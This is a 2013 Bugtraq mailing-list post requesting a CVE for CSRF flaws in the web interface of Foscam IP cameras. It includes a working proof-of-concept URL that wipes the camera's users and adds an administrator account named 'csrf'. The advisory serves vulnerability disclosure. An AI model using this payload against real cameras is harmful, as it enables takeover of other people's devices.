lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 8 Apr 2013 04:22:50 GMT
From: shekyan@...il.com
To: bugtraq@...urityfocus.com
Subject: [CVE-REQUEST]  Multiple CSRF vulnerabilities on Foscam IP cameras
 web UI

Embedded Web interface version  2.4.10.3 and older of Foscam FI8910W, FI8908W and many others is vulnerable to CSRF attacks. 
This allows attacker to perform calls to any CGI API using cached basic server authentication data stored in victims browser.
Details:
For example, the following URL requested by victims browser would wipe all user records and add 'csrf' user with administrator privileges:
http://cameraurl/set_users.cgi?user1=&pwd1=&pri1=2&user2=&pwd2=&pri2=&user3=&pwd3=&pri3=&user4=&pwd4=&pri4=&user5=&pwd5=&pri5=&user6=&pwd6=&pri6=&user7=&pwd7=&pri7=&user8=csrf&pwd8=csrf&pri8=2&next_url=

The CGI API manual for mentioned cameras is available at http://www.foscam.es/descarga/ipcam_cgi_sdk.pdf .

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ